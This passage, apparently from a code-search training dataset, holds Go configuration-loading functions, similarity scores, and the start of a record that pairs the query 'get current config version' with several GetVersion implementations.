function\n\n\tdecoder := json.NewDecoder(f) // Create json decoder\n\terr = decoder.Decode(&cfg) // Decode the json into the config struct\n\n\t// Error checking\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (c *Config) LoadConfig(path string, v interface{}) error {\n // get config map\n resMap, err := c.LoadFile(path)\n if err != nil {\n return err\n }\n // parse map to struct\n err = c.parseMap(resMap, v)\n if err != nil {\n return err\n }\n return nil\n}", "func loadConfig() (Config, error) {\n\t// We're looking for a file named \"stee.yaml\"\n\tviper.SetConfigName(\"stee\")\n\tviper.SetConfigType(\"yaml\")\n\n\t// In those directories\n\tviper.AddConfigPath(\".\")\n\tviper.AddConfigPath(\"/etc/stee/\")\n\n\t// Environement variables take precedence over file config. See https://github.com/spf13/viper#why-viper\n\tviper.AutomaticEnv()\n\n\t// Defaults are the less important values. https://github.com/spf13/viper#why-viper\n\tsetConfigDefaults()\n\n\terr := viper.ReadInConfig()\n\tif err != nil {\n\t\treturn Config{}, err\n\t}\n\n\tvar cfg Config\n\terr = viper.Unmarshal(&cfg)\n\tif err != nil {\n\t\treturn Config{}, err\n\t}\n\n\treturn cfg, err\n}", "func LoadConfig(prefix string) (*Config, error) {\n\tres := &Config{}\n\treturn res, errors.Wrap(envconfig.Process(prefix, res), \"parse config\")\n}", "func (m *Meta) loadConfig(rootDir string) (*configs.Config, tfdiags.Diagnostics) {\n\tvar diags tfdiags.Diagnostics\n\trootDir = m.normalizePath(rootDir)\n\n\tloader, err := m.initConfigLoader()\n\tif err != nil {\n\t\tdiags = diags.Append(err)\n\t\treturn nil, diags\n\t}\n\n\tconfig, hclDiags := loader.LoadConfig(rootDir)\n\tdiags = diags.Append(hclDiags)\n\treturn config, diags\n}", "func Load(conf interface{}, envPrefix string, cfgFile string) error {\n\t// Apply defaults first\n\tdefaults.SetDefaults(conf)\n\n\t// Uppercase the prefix\n\tupPrefix := strings.ToUpper(envPrefix)\n\n\t// Overrides with environment\n\tfor k := range AsEnvVariables(conf, \"\", false) {\n\t\tenvName := fmt.Sprintf(\"%s_%s\", upPrefix, k)\n\t\tviper.BindEnv(strings.ToLower(strings.Replace(k, \"_\", \".\", -1)), envName)\n\t}\n\n\t// Apply file settings\n\tif cfgFile != \"\" {\n\t\t// If the config file doesn't exists, let's exit\n\t\tif _, err := os.Stat(cfgFile); os.IsNotExist(err) {\n\t\t\treturn xerrors.Errorf(\"Unable to open non-existing file '%s': %w\", cfgFile, err)\n\t\t}\n\n\t\tlog.Info(\"Load settings from file\", \"path\", cfgFile)\n\n\t\tviper.SetConfigName(\"config\")\n\t\tviper.SetConfigType(\"yaml\")\n\t\tviper.SetConfigFile(cfgFile)\n\t\tif err := viper.ReadInConfig(); err != nil {\n\t\t\treturn xerrors.Errorf(\"Unable to decode config file '%s': %w\", cfgFile, err)\n\t\t}\n\t}\n\n\t// Update viper values\n\tif err := viper.Unmarshal(conf); err != nil {\n\t\treturn xerrors.Errorf(\"Unable to apply config '%s': %w\", cfgFile, err)\n\t}\n\n\t// No error\n\treturn nil\n}", "func loadConfig(path string) Config {\n\tvar config Config\n\tviper.SetConfigName(\"config\")\n\tviper.AddConfigPath(path)\n\terr := viper.ReadInConfig() // Find and read the config file\n\tif err != nil { // Handle errors reading the config file\n\t\tpanic(fmt.Errorf(\"Fatal error config file: %s\", err))\n\t}\n\terr = viper.Unmarshal(&config)\n\thandleErr(err)\n\treturn config\n}", "func loadConfig(c *cli.Context, file string, kmsEncryptionContext map[string]*string) (*config.Config, error) {\n\tvar err error\n\tvar configPath string\n\tif c.String(\"config\") != \"\" {\n\t\tconfigPath = c.String(\"config\")\n\t} else {\n\t\t// Ignore config not found errors returned from FindConfigFile since the config file is not mandatory\n\t\tconfigPath, err = config.FindConfigFile(\".\")\n\t\tif err != nil {\n\t\t\t// If we can't find a config file, but we were not explicitly requested to, assume it does not exist\n\t\t\treturn nil, nil\n\t\t}\n\t}\n\tconf, err := config.LoadForFile(configPath, file, kmsEncryptionContext)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn conf, nil\n}", "func loadEnv() Configuration {\n\thistorySize := 10\n\thistorySizeStr := os.Getenv(\"HISTORY_SIZE\")\n\tif historySizeStr != \"\" {\n\t\thistorySize , _ = strconv.Atoi(historySizeStr)\n\t}\n\tthreads := 10\n\tthreadsStr := os.Getenv(\"THREADS\")\n\tif threadsStr != \"\" {\n\t\tthreads, _ = strconv.Atoi(threadsStr)\n\t}\n\tserverUrl := os.Getenv(\"SERVER_URL\")\n\tif serverUrl == \"\" {\n\t\tserverUrl = \":9000\"\n\t}\n\tclientUrl := os.Getenv(\"CLIENT_URL\")\n\tif clientUrl == \"\" {\n\t\tclientUrl = \":9001\"\n\t}\n\treturn Configuration{\n\t\tHistorySize: historySize,\n\t\tClientUrl: clientUrl,\n\t\tServerUrl: serverUrl,\n\t\tThreads: threads}\n}", "func (c *Container) LoadConfig() error {\n\tfilename := filepath.Join(containerPath, c.Digest, containerConfigFile)\n\tfile, err := os.Open(filename)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer file.Close()\n\tconfigFile, err := v1.ParseConfigFile(file)\n\tif err != nil {\n\t\treturn err\n\t}\n\tc.Config = configFile.Config.DeepCopy()\n\treturn nil\n}", "func readConfig() {\n\tconfigPath := io.FixPrefixPath(viper.GetString(\"datadir\"), viper.GetString(\"config\"))\n\n\tif io.FileExists(configPath) {\n\t\tmergeLocalConfig(configPath)\n\t} else {\n\t\tfmt.Println(\"config file not exist \", configPath)\n\t\tmergeOnlineConfig(viper.GetString(\"config\"))\n\t}\n\n\t// load injected config from ogbootstrap if any\n\tinjectedPath := io.FixPrefixPath(viper.GetString(\"datadir\"), \"injected.toml\")\n\tif io.FileExists(injectedPath) {\n\t\tmergeLocalConfig(injectedPath)\n\t}\n\n\tmergeEnvConfig()\n\tb, err := common.PrettyJson(viper.AllSettings())\n\tpanicIfError(err, \"dump json\")\n\tfmt.Println(b)\n}", "func LoadConfig() (*Config, error) {\n\tvar config Config\n\tif err := envconfig.Process(\"\", &config); err != nil {\n\t\treturn nil, err\n\t}\n\treturn &config, nil\n}", "func loadConfig() {\n\tvar err error\n\n\tswitch {\n\tcase !fsutil.IsExist(CONFIG_FILE):\n\t\tprintErrorAndExit(\"Configuration file %s does not exist\", CONFIG_FILE)\n\n\tcase !fsutil.IsReadable(CONFIG_FILE):\n\t\tprintErrorAndExit(\"Configuration file %s is not readable\", CONFIG_FILE)\n\n\tcase !fsutil.IsNonEmpty(CONFIG_FILE):\n\t\tprintErrorAndExit(\"Configuration file %s is empty\", CONFIG_FILE)\n\t}\n\n\terr = knf.Global(CONFIG_FILE)\n\n\tif err != nil {\n\t\tprintErrorAndExit(err.Error())\n\t}\n}", "func LoadConfig(filePath string) (*MainConfig, error) {\n\tcfg := MainConfig{}\n\tif filePath != \"\" {\n\t\terr := readFile(&cfg, filePath)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\terr := readEnv(&cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &cfg, nil\n}", "func (a *appState) loadConfigFile(ctx context.Context) error {\n\tcfgPath := a.configPath()\n\n\tif _, err := os.Stat(cfgPath); err != nil {\n\t\t// don't return error if file doesn't exist\n\t\treturn nil\n\t}\n\n\t// read the config file bytes\n\tfile, err := os.ReadFile(cfgPath)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error reading file: %w\", err)\n\t}\n\n\t// unmarshall them into the wrapper struct\n\tcfgWrapper := &ConfigInputWrapper{}\n\terr = yaml.Unmarshal(file, cfgWrapper)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error unmarshalling config: %w\", err)\n\t}\n\n\t// retrieve the runtime configuration from the disk configuration.\n\tnewCfg, err := cfgWrapper.RuntimeConfig(ctx, a)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// validate runtime configuration\n\tif err := newCfg.validateConfig(); err != nil {\n\t\treturn fmt.Errorf(\"error parsing chain config: %w\", err)\n\t}\n\n\t// save runtime configuration in app state\n\ta.config = newCfg\n\n\treturn nil\n}", "func LoadConfig() (*Config, error) {\n\tvar cfg Config\n\n\terr := envconfig.Process(\"\", &cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &cfg, nil\n}", "func readConfig() (*config, error) {\n\tcfgPath := *configPath\n\tuserSpecified := *configPath != \"\"\n\n\tvar homeDir string\n\tif testHomeDir != \"\" {\n\t\thomeDir = testHomeDir\n\t} else {\n\t\tu, err := user.Current()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\thomeDir = u.HomeDir\n\t}\n\n\tif !userSpecified {\n\t\tcfgPath = filepath.Join(homeDir, \"src-config.json\")\n\t} else if strings.HasPrefix(cfgPath, \"~/\") {\n\t\tcfgPath = filepath.Join(homeDir, cfgPath[2:])\n\t}\n\tdata, err := os.ReadFile(os.ExpandEnv(cfgPath))\n\tif err != nil && (!os.IsNotExist(err) || userSpecified) {\n\t\treturn nil, err\n\t}\n\tvar cfg config\n\tif err == nil {\n\t\tcfg.ConfigFilePath = cfgPath\n\t\tif err := json.Unmarshal(data, &cfg); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tenvToken := os.Getenv(\"SRC_ACCESS_TOKEN\")\n\tenvEndpoint := os.Getenv(\"SRC_ENDPOINT\")\n\n\tif userSpecified {\n\t\t// If a config file is present, either zero or both environment variables must be present.\n\t\t// We don't want to partially apply environment variables.\n\t\tif envToken == \"\" && envEndpoint != \"\" {\n\t\t\treturn nil, errConfigMerge\n\t\t}\n\t\tif envToken != \"\" && envEndpoint == \"\" {\n\t\t\treturn nil, errConfigMerge\n\t\t}\n\t}\n\n\t// Apply config overrides.\n\tif envToken != \"\" {\n\t\tcfg.AccessToken = envToken\n\t}\n\tif envEndpoint != \"\" {\n\t\tcfg.Endpoint = envEndpoint\n\t}\n\tif cfg.Endpoint == \"\" {\n\t\tcfg.Endpoint = \"https://sourcegraph.com\"\n\t}\n\n\tcfg.AdditionalHeaders = parseAdditionalHeaders()\n\t// Ensure that we're not clashing additonal headers\n\t_, hasAuthorizationAdditonalHeader := cfg.AdditionalHeaders[\"authorization\"]\n\tif cfg.AccessToken != \"\" && hasAuthorizationAdditonalHeader {\n\t\treturn nil, errConfigAuthorizationConflict\n\t}\n\n\t// Lastly, apply endpoint flag if set\n\tif endpoint != nil && *endpoint != \"\" {\n\t\tcfg.Endpoint = *endpoint\n\t}\n\n\tcfg.Endpoint = cleanEndpoint(cfg.Endpoint)\n\n\treturn &cfg, nil\n}", "func Load(appName string) (*Configuration, error) {\n\tvar cfg Configuration\n\tif err := envconfig.Process(appName, &cfg); err != nil {\n\t\treturn nil, fmt.Errorf(\"error loading configuration for %s: %s\", appName, err)\n\t}\n\n\treturn &cfg, nil\n}", "func LoadConfig(filePath string) (Config, error) {\n\tdata, err := ioutil.ReadFile(filePath)\n\tif err != nil {\n\t\treturn Config{}, err\n\t}\n\n\tvar conf = Config{}\n\n\terr = json.Unmarshal(data, &conf)\n\n\tlog.Println(conf)\n\n\tif err != nil {\n\t\treturn Config{}, err\n\t}\n\n\tvar abs string\n\tabs, err = filepath.Abs(conf.MocksRootDir)\n\n\tif err != nil {\n\t\treturn Config{}, err\n\t}\n\n\tconf.MocksRootDir = abs\n\n\tabs, err = filepath.Abs(conf.LogsPath)\n\n\tif err != nil {\n\t\treturn Config{}, err\n\t}\n\n\tconf.LogsPath = abs\n\n\treturn conf, nil\n}", "func (appConfig *AppConfiguration) Load(filename string) {\n\n\tif filename != \"\" {\n\t\t// Use config file from the flag.\n\t\tappConfig.viper.SetConfigFile(filename)\n\t} else {\n\t\t// Find home directory.\n\t\thome, err := homedir.Dir()\n\t\tif err != nil {\n\t\t\tglog.Errorf(\"Error determining home directory: %v\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\t// Search config in home directory with name \".restic-manager\" (without extension).\n\t\tappConfig.viper.AddConfigPath(home)\n\t\tappConfig.viper.SetConfigName(\".restic-manager\")\n\t}\n\n\tappConfig.viper.AutomaticEnv() // read in environment variables that match\n\n\t// If a config file is found, read it in.\n\tif err := appConfig.viper.ReadInConfig(); err != nil {\n\t\tglog.Errorf(\"Could not load application configuration from %v: %v\", filename, err)\n\t} else {\n\t\tglog.Debugf(\"Using config file: %s\", appConfig.viper.ConfigFileUsed())\n\t}\n}", "func loadConfig() *conf.ConfigFile {\n\tc := conf.NewConfigFile()\n\tglobal, err := os.Open(GlobalConfig)\n\tif err == nil {\n\t\tdefer global.Close()\n\t\tif err = c.Read(global); err != nil {\n\t\t\tlog.Fatalln(\"ERROR: reading global config: \", err)\n\t\t\treturn c\n\t\t}\n\t}\n\n\thome := os.Getenv(\"HOME\")\n\tuser, err := os.Open(filepath.Join(home, UserConfig))\n\tif err == nil {\n\t\tdefer user.Close()\n\t\tif err = c.Read(user); err != nil {\n\t\t\tlog.Fatalln(\"ERROR: reading per user config: \", err)\n\t\t\treturn c\n\t\t}\n\t}\n\n\treturn c\n}", "func LoadConfig(path string) (config Config, err error) {\n\tviper.AddConfigPath(path)\n\tviper.SetConfigName(\"app\")\n\tviper.SetConfigType(\"env\")\n\n\tviper.AutomaticEnv()\n\n\terr = viper.ReadInConfig()\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = viper.Unmarshal(&config)\n\treturn\n}", "func LoadConfig(path string) (config Config, err error) {\n\tviper.AddConfigPath(path)\n\tviper.SetConfigName(\"app\")\n\tviper.SetConfigType(\"env\")\n\n\tviper.AutomaticEnv()\n\n\terr = viper.ReadInConfig()\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = viper.Unmarshal(&config)\n\treturn\n}", "func LoadConfig(path string) (config Config, err error) {\n\tviper.AddConfigPath(path)\n\tviper.SetConfigName(\"app\")\n\tviper.SetConfigType(\"env\")\n\n\tviper.AutomaticEnv()\n\n\terr = viper.ReadInConfig()\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = viper.Unmarshal(&config)\n\treturn\n}", "func Load() (Config, error) {\n\t// STEP 1: try to load config file from SCW_CONFIG_PATH\n\tconfigPath := os.Getenv(scwConfigPathEnv)\n\tif configPath != \"\" {\n\t\tcontent, err := ioutil.ReadFile(configPath)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"cannot read config file %s: %s\", scwConfigPathEnv, err)\n\t\t}\n\t\tconfV1, err := unmarshalConfV1(content)\n\t\tif err == nil {\n\t\t\t// do not migrate automatically when using SCW_CONFIG_PATH\n\t\t\tlogger.Warningf(\"loaded config V1 from %s: config V1 is deprecated, please switch your config file to the V2: %s\", configPath, documentationLink)\n\t\t\treturn confV1.toV2().catchInvalidProfile()\n\t\t}\n\t\tconfV2, err := unmarshalConfV2(content)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"content of config file %s is invalid: %s\", configPath, err)\n\t\t}\n\n\t\tlogger.Infof(\"successfully loaded config V2 from %s\", configPath)\n\t\treturn confV2.catchInvalidProfile()\n\t}\n\n\t// STEP 2: try to load config file V2\n\tv2Path, v2PathOk := GetConfigV2FilePath()\n\tif v2PathOk && fileExist(v2Path) {\n\t\tfile, err := ioutil.ReadFile(v2Path)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"cannot read config file: %s\", err)\n\t\t}\n\n\t\tconfV2, err := unmarshalConfV2(file)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"content of config file %s is invalid: %s\", v2Path, err)\n\t\t}\n\n\t\tlogger.Infof(\"successfully loaded config V2 from %s\", v2Path)\n\t\treturn confV2.catchInvalidProfile()\n\t}\n\n\t// STEP 3: try to load config file V1\n\tlogger.Debugf(\"no config V2 found, fall back to config V1\")\n\tv1Path, v1PathOk := GetConfigV1FilePath()\n\tif !v1PathOk {\n\t\tlogger.Infof(\"config file not found: no home directory\")\n\t\treturn (&configV2{}).catchInvalidProfile()\n\t}\n\tfile, err := ioutil.ReadFile(v1Path)\n\tif err != nil {\n\t\tlogger.Infof(\"cannot read config file: %s\", err)\n\t\treturn (&configV2{}).catchInvalidProfile() // ignore if file doesn't exist\n\t}\n\tconfV1, err := unmarshalConfV1(file)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"content of config file %s is invalid json: %s\", v1Path, err)\n\t}\n\n\t// STEP 4: migrate V1 config to V2 config file\n\tif v2PathOk {\n\t\terr = migrateV1toV2(confV1, v2Path)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn confV1.toV2().catchInvalidProfile()\n}", "func LoadConfig(path string, configFileName string) *Configuration {\n\tconfig := viper.New()\n\n\tconfig.AutomaticEnv()\n\tconfig.SetEnvPrefix(\"AL\")\n\tconfig.SetDefault(\"APP_NAME\", \"AssetsLiabilities\")\n\tconfig.SetDefault(\"MODE\", DefaultMode)\n\tconfig.SetDefault(\"DOMAIN\", \"https://kwmassetsliabilities.com\")\n\t// Don't want to worry about CORS right now\n\tconfig.SetDefault(\"ALLOWABLE_ORIGIN\", \"*\")\n\n\tconfig.SetDefault(\"ADDRESS\", \"127.0.0.1\")\n\tconfig.SetDefault(\"PORT\", \"8080\")\n\n\tconfig.SetDefault(\"DB_HOST\", \"localhost\")\n\tconfig.SetDefault(\"DB_PORT\", \"5432\")\n\tconfig.SetDefault(\"DB_NAME\", \"postgres\")\n\tconfig.SetDefault(\"DB_USER\", \"postgres\")\n\tconfig.SetDefault(\"DB_PASSWORD\", \"postgres\")\n\tconfig.SetDefault(\"DB_SSL_MODE\", \"disable\")\n\n\tconfig.SetDefault(\"SESSION_SECRET\", \"\")\n\tconfig.SetDefault(\"SESSION_EXPIRE_IN\", \"40000s\")\n\tconfig.SetDefault(\"DEBUG_MODE\", \"false\")\n\n\tconfig.SetDefault(\"READ_TIMEOUT_IN_SECONDS\", \"15s\")\n\tconfig.SetDefault(\"WRITE_TIMEOUT_IN_SECONDS\", \"15s\")\n\n\treturn &Configuration{\n\t\tAppName: config.GetString(\"APP_NAME\"),\n\t\tMode: config.GetString(\"MODE\"),\n\t\tDomain: config.GetString(\"DOMAIN\"),\n\t\tAllowableOrigin: config.GetString(\"ALLOWABLE_ORIGIN\"),\n\n\t\tAddress: config.GetString(\"ADDRESS\"),\n\t\tPort: config.GetInt32(\"PORT\"),\n\n\t\tDBHost: config.GetString(\"DB_HOST\"),\n\t\tDBPort: config.GetInt32(\"DB_PORT\"),\n\t\tDBName: config.GetString(\"DB_NAME\"),\n\t\tDBUser: config.GetString(\"DB_USER\"),\n\t\tDBPassword: config.GetString(\"DB_PASSWORD\"),\n\t\tDBSSLMode: config.GetString(\"DB_SSL_MODE\"),\n\n\t\tDebugMode: config.GetBool(\"DEBUG_MODE\"),\n\n\t\tSessionSecret: config.GetString(\"SESSION_SECRET\"),\n\t\tSessionExpireIn: config.GetDuration(\"SESSION_EXPIRE_IN\"),\n\n\t\tReadTimeoutInSeconds: config.GetDuration(\"READ_TIMEOUT_IN_SECONDS\"),\n\t\tWriteTimeoutInSeconds: config.GetDuration(\"WRITE_TIMEOUT_IN_SECONDS\"),\n\t}\n}", "func LoadConfig(appName string) {\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\treadConfig(\"/etc/\", appName)\n\t\treadConfig(os.ExpandEnv(\"$HOME\"), appName)\n\tcase \"windows\":\n\t\treadConfig(os.ExpandEnv(\"$ALLUSERSPROFILE\"), appName)\n\t\treadConfig(os.ExpandEnv(\"$APPDATA\"), appName)\n\tdefault:\n\t\tvlog.Warn(\"App:Config\", \"Unsupported operating system\")\n\t}\n\treadConfig(GetExecDir(), appName)\n}", "func LoadConfig(filename string) (*Configuration, error) {\n\tif err := loadEnvironment(filename); err != nil {\n\t\treturn nil, err\n\t}\n\n\tconfig := new(Configuration)\n\tif err := envconfig.Process(\"oe\", config); err != nil {\n\t\treturn nil, err\n\t}\n\tconfig.ApplyDefaults()\n\treturn config, nil\n}" ]
[ "0.7223439", "0.722297", "0.71862006", "0.71744114", "0.7138698", "0.7075792", "0.70620877", "0.69731885", "0.69388396", "0.68734336", "0.68586993", "0.6851916", "0.6850344", "0.684288", "0.68320143", "0.6828521", "0.68100923", "0.6797417", "0.6796891", "0.6795742", "0.67936856", "0.6785101", "0.6781541", "0.67756313", "0.67576504", "0.6716471", "0.67125636", "0.6700643", "0.668861", "0.668203", "0.6681939", "0.6673131", "0.6672992", "0.6670928", "0.6664617", "0.66632915", "0.66606605", "0.66515195", "0.6642683", "0.66383195", "0.6636609", "0.66351944", "0.66348803", "0.66272086", "0.6602822", "0.6600275", "0.6598526", "0.6591603", "0.6588364", "0.6586358", "0.65841407", "0.65750563", "0.6568213", "0.6562253", "0.65577745", "0.6556494", "0.65403605", "0.653748", "0.6535793", "0.6530636", "0.65284", "0.6527074", "0.65262926", "0.65235406", "0.6523303", "0.652325", "0.65221924", "0.6514864", "0.65099365", "0.6508574", "0.64977443", "0.6494539", "0.64943576", "0.6494352", "0.648991", "0.6489514", "0.6485949", "0.6480864", "0.6480384", "0.6480172", "0.6479836", "0.6475703", "0.6471706", "0.64671075", "0.64603555", "0.6458597", "0.6457333", "0.6456238", "0.6450919", "0.6445971", "0.64426154", "0.6433374", "0.6428511", "0.6427637", "0.6427637", "0.6427637", "0.64270985", "0.6426351", "0.64242536", "0.6417415" ]
0.7518673
0
GetVersion get current config version.
func (s serverConfigV14) GetVersion() string { serverConfigMu.RLock() defer serverConfigMu.RUnlock() return s.Version }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (cfg *Config) GetVersion() int {\n\treturn cfg.Version\n}", "func (d *MessagesDhConfig) GetVersion() (value int) {\n\tif d == nil {\n\t\treturn\n\t}\n\treturn d.Version\n}", "func (o *TeamConfiguration) GetVersion() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.Version\n}", "func (m *MarshalConfig) GetVersion() string {\n\tif m.Version == \"\" {\n\t\treturn V2\n\t}\n\treturn m.Version\n}", "func GetVersion() string {\n\treturn version\n}", "func GetVersion() string {\n\treturn version\n}", "func GetVersion() string {\n\treturn version.GetVersion()\n}", "func (r *SoftwareVolumeResource) GetVersion() (string, error) {\n\tvar list SoftwareVolumeConfigList\n\tif err := r.c.ReadQuery(BasePath+SoftwareVolumeEndpoint, &list); err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvar version string\n\n\tfor _, vol := range list.Items {\n\t\tif vol.Active == true {\n\t\t\tversion = vol.Version + \" \" + vol.Build\n\t\t}\n\t}\n\n\treturn version, nil\n}", "func GetVersion() string {\n\treturn __VERSION__\n}", "func Get() string {\n\treturn VERSION\n}", "func Get() string {\n\treturn Version\n}", "func GetVersion() string {\n\treturn Version\n}", "func GetVersion() string {\n\treturn Version\n}", "func GetVersion() string {\n\treturn getEnv(\"ENM_API_VERSION\", \"v1\")\n}", "func (c *Context) GetVersion() string { // 获取版本号\n\treturn c.GetGinCtx().Param(\"version\")\n}", "func GetVersion() string {\n\treturn VersionString\n}", "func GetVersion() string {\n\n\tcwd, _ := os.Getwd()\n\tcurrentFolderPathList := strings.Split(cwd, \"/\")\n\tlenFolder := len(currentFolderPathList)\n\tcurrFolder := currentFolderPathList[lenFolder-1]\n\n\tversionInformation := strings.Split(currFolder, \"-\")\n\n\t// In case we are not executing in the install directory, return\n\t// the version present in versionMetadata.json.\n\tif len(versionInformation) < 3 {\n\n\t\tviper.SetConfigName(\"version_metadata.json\")\n\t\tviper.SetConfigType(\"json\")\n\t\tviper.AddConfigPath(\".\")\n\t\terr := viper.ReadInConfig()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\n\t\tversionNumber := fmt.Sprint(viper.Get(\"version_number\"))\n\t\tbuildNumber := fmt.Sprint(viper.Get(\"build_number\"))\n\n\t\tversion := versionNumber + \"-\" + buildNumber\n\n\t\treturn version\n\n\t}\n\n\tversionNumber := versionInformation[1]\n\tbuildNumber := versionInformation[2]\n\n\tversion := versionNumber + \"-\" + buildNumber\n\n\treturn version\n}", "func (m *DeviceManagementConfigurationSettingDefinition) GetVersion()(*string) {\n val, err := m.GetBackingStore().Get(\"version\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*string)\n }\n return nil\n}", "func GetVersion() string {\n\tif len(Version) == 0 {\n\t\treturn \"dev\"\n\t}\n\treturn Version\n}", "func GetVersion() string {\n\tif len(Version) == 0 {\n\t\treturn \"dev\"\n\t}\n\treturn Version\n}", "func GetVersion() string {\n\tversion, ok := os.LookupEnv(\"VERSION\")\n\tif !ok {\n\t\tversion = \"default\"\n\t}\n\treturn version\n}", "func Get() string {\n\tvar version string\n\tversion = \"v1.3.4\"\n\treturn version\n}", "func (_PlasmaFramework *PlasmaFrameworkSession) GetVersion() (string, error) {\n\treturn _PlasmaFramework.Contract.GetVersion(&_PlasmaFramework.CallOpts)\n}", "func (m *DigicamControl) GetVersion() int {\n\tif m.HasExtensionFieldValues {\n\t\treturn 2\n\t}\n\n\treturn 1\n}", "func (_PlasmaFramework *PlasmaFrameworkCallerSession) GetVersion() (string, error) {\n\treturn _PlasmaFramework.Contract.GetVersion(&_PlasmaFramework.CallOpts)\n}", "func (c *InjectionConfig) Version() string {\n\tif c.version == \"\" {\n\t\treturn defaultVersion\n\t}\n\n\treturn c.version\n}", "func (c *Cron) GetVersion() string { return c.Version }", "func GetVersion(c echo.Context) error {\n\n\t// This is being managed by config.go file. I don't like using empty interfaces\n\tversion := config.GuitaristReleaseVersion\n\n\tv := &Version{\n\t\tStatus: \"ok\",\n\t\tVersion: version,\n\t}\n\n\treturn c.JSON(http.StatusOK, v)\n}", "func (o *EnvironmentAutoUpdateConfig) GetVersion() string {\n\tif o == nil || o.Version == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Version\n}", "func (_PlasmaFramework *PlasmaFrameworkCaller) GetVersion(opts *bind.CallOpts) (string, error) {\n\tvar (\n\t\tret0 = new(string)\n\t)\n\tout := ret0\n\terr := _PlasmaFramework.contract.Call(opts, out, \"getVersion\")\n\treturn *ret0, err\n}", "func GetVersion(c *gin.Context) {\n\tc.JSON(http.StatusOK, gin.H{\n\t\t\"version\": Version,\n\t\t\"merchant_name\": MerchantName,\n\t})\n}", "func (_SimpleMultiSig *SimpleMultiSigCallerSession) GetVersion() (string, error) {\n\treturn _SimpleMultiSig.Contract.GetVersion(&_SimpleMultiSig.CallOpts)\n}", "func (o *AddonStatus) GetVersion() (value string, ok bool) {\n\tok = o != nil && o.bitmap_&64 != 0\n\tif ok {\n\t\tvalue = o.version\n\t}\n\treturn\n}", "func (p Plugin) GetVersion() string {\n\treturn Version\n}", "func GetVersion() string {\n\tvar versionString bytes.Buffer\n\tfmt.Fprintf(&versionString, \"v%s\", versn)\n\tif env != \"\" {\n\t\tfmt.Fprintf(&versionString, \"-%s\", env)\n\t}\n\n\treturn versionString.String()\n}", "func GetVersion() string {\n\tv := Map[\"version\"]\n\treturn v\n}", "func (_Bridge *BridgeCallerSession) GetVersion() (string, error) {\n\treturn _Bridge.Contract.GetVersion(&_Bridge.CallOpts)\n}", "func (_Bridge *BridgeSession) GetVersion() (string, error) {\n\treturn _Bridge.Contract.GetVersion(&_Bridge.CallOpts)\n}", "func (_SimpleMultiSig *SimpleMultiSigSession) GetVersion() (string, error) {\n\treturn _SimpleMultiSig.Contract.GetVersion(&_SimpleMultiSig.CallOpts)\n}", "func (c ClientWrapper) GetVersion() uint {\n\treturn c.esVersion\n}", "func (k Keeper) GetCurrentVersion(ctx sdk.Context) uint64 {\n\treturn k.protocolKeeper.GetCurrentVersion(ctx)\n}", "func Version() (version string) {\n\treturn GetVersion()\n}", "func (_SimpleMultiSig *SimpleMultiSigCaller) GetVersion(opts *bind.CallOpts) (string, error) {\n\tvar (\n\t\tret0 = new(string)\n\t)\n\tout := ret0\n\terr := _SimpleMultiSig.contract.Call(opts, out, \"getVersion\")\n\treturn *ret0, err\n}", "func (p Plugin) GetVersion() string {\n\treturn \"v0.0.0\"\n}", "func (m *ComponentInformation) GetVersion() int {\n\tif m.HasExtensionFieldValues {\n\t\treturn 2\n\t}\n\n\treturn 1\n}", "func (cl *APIClient) GetVersion() string {\n\treturn \"2.2.3\"\n}", "func Version() string {\n\treturn version\n}", "func Version() string {\n\treturn version\n}", "func Version() string {\n\treturn version\n}", "func Version() string {\n\treturn version\n}", "func Version() string {\n\treturn version\n}", "func Version() string {\n\treturn version\n}", "func Version() string {\n\treturn version\n}", "func Version() string {\n\treturn version\n}", "func GetVersion(rw http.ResponseWriter) error {\n\tinfostat, err := host.Info()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn share.JSONResponse(infostat, rw)\n}", "func (net *NetAPI) Version() (string, error) {\n\treq := net.requestManager.newRequest(\"net_version\")\n\tresp, err := net.requestManager.send(req)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn resp.Get(\"result\").(string), nil\n}", "func (o *MicrosoftGraphSharedPcConfiguration) GetVersion() int32 {\n\tif o == nil || o.Version == nil {\n\t\tvar ret int32\n\t\treturn ret\n\t}\n\treturn *o.Version\n}", "func GetVersion() {\n\tif *versionFlag {\n\t\tversion.Get().Print()\n\t\tos.Exit(0)\n\t}\n}", "func getVersion() string {\n\tslurp, err := ioutil.ReadFile(filepath.Join(camRoot, \"VERSION\"))\n\tif err == nil {\n\t\treturn strings.TrimSpace(string(slurp))\n\t}\n\treturn gitVersion()\n}", "func Version() string {\n\treturn getData().Version\n}", "func (_Bridge *BridgeCaller) GetVersion(opts *bind.CallOpts) (string, error) {\n\tvar (\n\t\tret0 = new(string)\n\t)\n\tout := 